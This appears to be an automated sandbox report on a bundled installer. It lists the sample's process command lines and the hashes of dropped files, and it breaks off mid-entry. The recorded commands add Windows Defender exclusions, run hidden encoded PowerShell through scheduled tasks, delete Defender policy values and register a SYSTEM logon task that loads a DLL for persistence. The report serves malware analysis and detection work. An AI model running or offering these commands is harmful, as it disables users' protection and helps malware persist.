"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gCjFpOJnN" /SC once /ST 13:45:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gCjFpOJnN"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gCjFpOJnN"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "YESfVrKgbFKcjSeIN" /SC once /ST 08:19:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe\" qz /site_id 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "YESfVrKgbFKcjSeIN"

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe

C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe qz /site_id 757674 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bGAvhKhnIPTNQeobsw"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\XxxUzwYQU\gZNljN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "iwOiVBtjWoVYUMW" /V1 /F

Network


Files

memory/1992-54-0x0000000076411000-0x0000000076413000-memory.dmp

memory/1992-55-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp

MD5 f37fc9007d7cac6c71bfc69921887808
SHA1 ca60cb48048e3bd66919205fadf3be9b54b0ddfd
SHA256 f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53
SHA512 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9

memory/1032-58-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp

MD5 f37fc9007d7cac6c71bfc69921887808
SHA1 ca60cb48048e3bd66919205fadf3be9b54b0ddfd
SHA256 f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53
SHA512 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9

C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp

MD5 f37fc9007d7cac6c71bfc69921887808
SHA1 ca60cb48048e3bd66919205fadf3be9b54b0ddfd
SHA256 f124fd180f1d91fb12f9d5df6f83faa3bba46bca37e6a5f8fb27022338231c53
SHA512 3c79e686cfbb8b7ce2a02b2b6a28403e63707164b1912ef550e629a29f26b2054f26f495ad6554a154cdf7e43dbf537fdd9b4bd0ad90916830438b5a6c567cd9

\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-G8NKV.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/1992-65-0x0000000000400000-0x0000000000414000-memory.dmp

\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/728-67-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/1032-70-0x0000000003930000-0x0000000004ABE000-memory.dmp

memory/728-71-0x0000000000400000-0x000000000158E000-memory.dmp

memory/728-72-0x0000000000400000-0x000000000158E000-memory.dmp

memory/728-73-0x0000000000400000-0x000000000158E000-memory.dmp

memory/760-74-0x0000000000000000-mapping.dmp

\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/1476-76-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

MD5 b8aa5a417e4954313a8001e72e66e51c
SHA1 672ee46f694277cc72dd5671baa1d22a6e3482b7
SHA256 ef3e8c0ad06d7c0310d862bccdd5d058f8c1b9d91ca3214c1a8239ec57733308
SHA512 5084940d52454e6d819b3b4bca553e08cffb01da11bfbf6acdf1db867b662906d5f4ece0f5b60e370c53b80e783ddfda826689550e2b166cb8baec211bfe4be2

memory/1032-79-0x0000000003930000-0x0000000004ABE000-memory.dmp

memory/1476-80-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1476-82-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1032-83-0x0000000003930000-0x0000000004ABE000-memory.dmp

memory/1476-84-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1476-85-0x0000000000400000-0x000000000158E000-memory.dmp

memory/1476-86-0x00000000746F1000-0x00000000746F3000-memory.dmp

C:\Program Files (x86)\Reg Organizer\TurboSearch.exe

MD5 4bf63923ee6f1f20b848371e51f44a7c
SHA1 1c8243554533882b9539c47e9f4a8c72183fe689
SHA256 aa69860c73e0be7add6f4f9945ad3b43e09ed000e8cf1153bd415a880806ddbb
SHA512 92859304a0f91cc9fb2ffdaba0a75f27736d84314d112466d290b6635e6e63d0f6348aaea6c944cdd2bafd16aadf9bfceb5e7496e1688544c8bf4f71cd8259ab

\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe

MD5 879c2312a3f8e7a4f866eb9c68a5c5be
SHA1 763c4907534823d898458ceb1064cfda93b3a242
SHA256 30a2de7b817d8f92c4985cce4880e25dc9681b9479bcecf69f39c5cc4c49fcb0
SHA512 53849bc22f8255158c2238c4cce7acca2b817d9e0fac2894cfc67cfad3e1325fb81267f834a15b3fe5f47ac4923730bf5a8f6c2da7dccf2b0a7a01c3606ca64b

memory/1952-89-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe

MD5 879c2312a3f8e7a4f866eb9c68a5c5be
SHA1 763c4907534823d898458ceb1064cfda93b3a242
SHA256 30a2de7b817d8f92c4985cce4880e25dc9681b9479bcecf69f39c5cc4c49fcb0
SHA512 53849bc22f8255158c2238c4cce7acca2b817d9e0fac2894cfc67cfad3e1325fb81267f834a15b3fe5f47ac4923730bf5a8f6c2da7dccf2b0a7a01c3606ca64b

memory/1924-97-0x0000000000000000-mapping.dmp

memory/1924-100-0x0000000000400000-0x0000000000414000-memory.dmp

memory/692-102-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe

MD5 c6f806e7f38f2f55f6b2e2d31b53564b
SHA1 02c96f6212a5f414199a503bfb3bb9010f2346a5
SHA256 e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7
SHA512 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f

C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe

MD5 7731cf5b42c4e5a7bf5859240bbcabd9
SHA1 881ecf093dd8241b664cfc7521a9351dc8d9cf7c
SHA256 a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10
SHA512 cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\System.dll

MD5 cff85c549d536f651d4fb8387f1976f2
SHA1 d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e
SHA256 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8
SHA512 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe

MD5 c6f806e7f38f2f55f6b2e2d31b53564b
SHA1 02c96f6212a5f414199a503bfb3bb9010f2346a5
SHA256 e60c013bf4be1df9fee388bade8d42fd6901182a5edf3d3d08b0f02c5770def7
SHA512 55262f9ac89391710efb217fe76ebb47d3240902f7c4d5f622dd8fba1417f240dfdb0b250beee5316cbe898858d93ef11e5c05e4e0858a94d6d9cdaf008ea28f

\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe

MD5 16ad463bc69dc5e2580ddc855b9f10b0
SHA1 2639d11cece15244c647964f3b515cc7b3d429f0
SHA256 a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e
SHA512 d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e

C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe

MD5 16ad463bc69dc5e2580ddc855b9f10b0
SHA1 2639d11cece15244c647964f3b515cc7b3d429f0
SHA256 a6c691a303ca0876e2841587979c48a6d54e65f287264a9ac857efbd2720100e
SHA512 d6141e0ce5e4b30855472e740d1ec8cc577e6766b2e2eb1ce9b9a8eeef89456e62bf9603339c13cfe46a004dc1a35bf2bb47ea74849de82613f2f5bb1d16bb5e

memory/900-94-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe

MD5 7731cf5b42c4e5a7bf5859240bbcabd9
SHA1 881ecf093dd8241b664cfc7521a9351dc8d9cf7c
SHA256 a3f18ccd375dc30af943b517597e4e7f7ed668aa6f711b807891d7225d11bd10
SHA512 cc1b3a89706660d4fa616243facfd682456a0e875d82d1ac62b8805f35bde672463e89fad0ffe77bbe915884e2e24511de9688b74097551e1e9b54d421fe3281

memory/1476-107-0x0000000006450000-0x000000000720D000-memory.dmp

memory/1952-108-0x0000000000400000-0x00000000011BD000-memory.dmp

\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/1996-111-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe

MD5 c11030bd1b9b76d5371f5d3e42d7620f
SHA1 20eac9ec20130b18a07eb883172afcedf39ba350
SHA256 a65b6626714168ad401984f586998df6d5d256ae6d93629b1cc92e888ad33780
SHA512 69f6bbf6b8f27ac62746a4abd469ab17659c6d19ab6de76278f391a8f094cfc77a9a2f8b163b0a6d179fbdf8eb956c4d01435dc15256fc6c01941bd351e6f020

memory/1996-114-0x0000000035560000-0x0000000036560000-memory.dmp

memory/1596-117-0x0000000000000000-mapping.dmp

memory/1492-118-0x0000000000000000-mapping.dmp

memory/300-119-0x0000000000000000-mapping.dmp

memory/2020-121-0x0000000000000000-mapping.dmp

memory/796-120-0x0000000000000000-mapping.dmp

memory/1660-122-0x0000000000000000-mapping.dmp

memory/1588-124-0x0000000000000000-mapping.dmp

memory/1816-123-0x0000000000000000-mapping.dmp

memory/1952-125-0x0000000000400000-0x00000000011BD000-memory.dmp

memory/1952-126-0x0000000000400000-0x00000000011BD000-memory.dmp

memory/1952-127-0x0000000000400000-0x00000000011BD000-memory.dmp

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\liteFirewall.dll

MD5 165e1ef5c79475e8c33d19a870e672d4
SHA1 965f02bfd103f094ac6b3eef3abe7fdcb8d9e2a5
SHA256 9db9c58e44dff2d985dc078fdbb7498dcc66c4cc4eb12f68de6a98a5d665abbd
SHA512 cd10eaf0928e5df048bf0488d9dbfe9442e2e106396a0967462bef440bf0b528cdf3ab06024fb6fdaf9f247e2b7f3ca0cea78afc0ce6943650ef9d6c91fee52a

\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

MD5 b3dba6728cf861a741a710442088683a
SHA1 bf3a57590117cae01c9911f82c69dbe71e5968db
SHA256 a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2
SHA512 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9

memory/1180-130-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

MD5 b3dba6728cf861a741a710442088683a
SHA1 bf3a57590117cae01c9911f82c69dbe71e5968db
SHA256 a9ada8996fc6ae710b6b74d1db7f1557cf5e52589872fdc6ed685e1e7e1acfa2
SHA512 7dba6cd1c6b24558055be15fbe88e7859487c4e8f07553123bc4089f31615b166321712f79d10ffa970f8c91851e7f07f0e4d0ba06141496c675172ee8a1f6d9

\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

MD5 cc21c45d87dc08784bdcd3c46ffdd400
SHA1 d63e755519c8cb45f84032a95bc77f91a39bc2c3
SHA256 1aa44b70218e3a392b631ffb6851a55c630fcfd7e5a26196a0a9dc1b09291feb
SHA512 f2d14152799b803d30bd339f14b475b58d3ee45157db308c360c683e647b4c616412875b10489c2bc5c1a4f7be3f9435137f2e6feef61f139fca0dfdcde6dced

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\md5dll.dll

MD5 7059f133ea2316b9e7e39094a52a8c34
SHA1 ee9f1487c8152d8c42fecf2efb8ed1db68395802
SHA256 32c3d36f38e7e8a8bafd4a53663203ef24a10431bda16af9e353c7d5d108610f
SHA512 9115986754a74d3084dd18018e757d3b281a2c2fde48c73b71dba882e13bd9b2ded0e6e7f45dc5b019e6d53d086090ccb06e18e6efeec091f655a128510cbe51

\Users\Admin\AppData\Local\Temp\nsjCA35.tmp\nsProcess.dll

MD5 f0438a894f3a7e01a4aae8d1b5dd0289
SHA1 b058e3fcfb7b550041da16bf10d8837024c38bf6
SHA256 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11
SHA512 f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

memory/828-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

MD5 cc21c45d87dc08784bdcd3c46ffdd400
SHA1 d63e755519c8cb45f84032a95bc77f91a39bc2c3
SHA256 1aa44b70218e3a392b631ffb6851a55c630fcfd7e5a26196a0a9dc1b09291feb
SHA512 f2d14152799b803d30bd339f14b475b58d3ee45157db308c360c683e647b4c616412875b10489c2bc5c1a4f7be3f9435137f2e6feef61f139fca0dfdcde6dced

memory/828-140-0x0000000000400000-0x0000000000414000-memory.dmp

memory/300-146-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

memory/1872-149-0x0000000000000000-mapping.dmp

memory/1180-148-0x0000000000E10000-0x0000000000E64000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp

MD5 e3dcae5ee7ee62e603d2a37128861468
SHA1 c68f71703f544ec31d1670c09a597c06c827fb46
SHA256 b1aa9fab8bd7c68246c60587cda7709166be3c1af95e17eeda73722ad08c0e8d
SHA512 f21cd0348762fd711c8de4cf56c98f7d9517856ed1f4f00f9ce62740bd26ee64943f5752132b459476dfa05a777fa2f5f5a5bd4dbfff0456a13b059642fe4d1c

memory/1820-152-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-O1KG5.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-O1KG5.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-67OBN.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

\Users\Admin\AppData\Local\Temp\is-67OBN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/828-164-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1500-163-0x0000000000000000-mapping.dmp

memory/1664-166-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\ScanRename\ScanRename.exe

MD5 21d5953226e85aacd484598f2e5107e6
SHA1 f6b043191ba9cdf8211740e7638c1dc592a4e393
SHA256 689e374732a99e7c78df62c317da2950bb16021988ddaea96fad4f4aaf944748
SHA512 6b7ec0dc92c6fb3ca05c8ffe3c077ac1eff10daa7c77a5ac19cafc5a1f96f30e9ad6f4b0a3816160a7369ae8745e4e024d7b40248c450ed8afa24fac461c662f

\Program Files (x86)\ScanRename\ScanRename.exe

MD5 21d5953226e85aacd484598f2e5107e6
SHA1 f6b043191ba9cdf8211740e7638c1dc592a4e393
SHA256 689e374732a99e7c78df62c317da2950bb16021988ddaea96fad4f4aaf944748
SHA512 6b7ec0dc92c6fb3ca05c8ffe3c077ac1eff10daa7c77a5ac19cafc5a1f96f30e9ad6f4b0a3816160a7369ae8745e4e024d7b40248c450ed8afa24fac461c662f

memory/1080-170-0x0000000000000000-mapping.dmp

\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

MD5 262bacb5f63eb9daf62c1c4ab2a20318
SHA1 bf196ed1fd658c32b4152c7f8b3f6af5af748a03
SHA256 1d2019b69f9a5f4688172a676a01e1078e8903626b36ccd8dd329ee928b17cb8
SHA512 5a0598e2e473b5bcaa9de1fc23a2f20a4861a854f23862bbdde077835927b676000877fd9af0092d0f885c969590db62d37a352eaab958fa22b2cd57484098a8

C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

MD5 262bacb5f63eb9daf62c1c4ab2a20318
SHA1 bf196ed1fd658c32b4152c7f8b3f6af5af748a03
